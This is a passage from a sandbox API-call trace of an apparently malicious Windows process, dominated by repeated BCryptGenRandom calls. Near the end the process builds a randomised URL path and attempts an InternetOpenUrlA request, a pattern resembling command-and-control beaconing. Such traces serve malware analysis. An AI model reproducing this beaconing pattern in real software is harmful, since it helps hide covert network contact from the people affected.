dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02196, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a02196) returned 0x0 [0174.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a021ab, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a021ab) returned 0x0 [0174.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0174.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0174.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a021d3, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a021d3) returned 0x0 [0174.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.552] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.554] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0174.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0174.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0174.557] GetProcessHeap () returned 0x440000 [0174.557] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0174.557] lstrcpyA (in: lpString1=0x4726f0, lpString2="P! \x03" | out: lpString1="P! \x03") returned="P! \x03" [0174.557] lstrcatA (in: lpString1="P! \x03", lpString2="/Q7m4d5kcxxKkzbjfvtuBCm84knqgw25ne40f9p77aY9wf/lix4xwl0dmenoph695aifo/80hILx4ejjhw61lfngi1/1onwdirE31cafrjc2smliVtomwMlvl8GwzhiM1n/afu10LpUkozkgY6jfKtqhm7f9s8yLnnnr4xR4wo/" | out: lpString1="P! \x03/Q7m4d5kcxxKkzbjfvtuBCm84knqgw25ne40f9p77aY9wf/lix4xwl0dmenoph695aifo/80hILx4ejjhw61lfngi1/1onwdirE31cafrjc2smliVtomwMlvl8GwzhiM1n/afu10LpUkozkgY6jfKtqhm7f9s8yLnnnr4xR4wo/") returned="P! \x03/Q7m4d5kcxxKkzbjfvtuBCm84knqgw25ne40f9p77aY9wf/lix4xwl0dmenoph695aifo/80hILx4ejjhw61lfngi1/1onwdirE31cafrjc2smliVtomwMlvl8GwzhiM1n/afu10LpUkozkgY6jfKtqhm7f9s8yLnnnr4xR4wo/" [0174.557] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0174.557] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P! \x03/Q7m4d5kcxxKkzbjfvtuBCm84knqgw25ne40f9p77aY9wf/lix4xwl0dmenoph695aifo/80hILx4ejjhw61lfngi1/1onwdirE31cafrjc2smliVtomwMlvl8GwzhiM1n/afu10LpUkozkgY6jfKtqhm7f9s8yLnnnr4xR4wo/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0174.558] GetProcessHeap () returned 0x440000 [0174.558] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0174.558] GetProcessHeap () returned 0x440000 [0174.558] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02150 | out: hHeap=0x440000) returned 1 [0174.558] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0174.558] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0174.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0174.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0174.558] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0174.558] Sleep 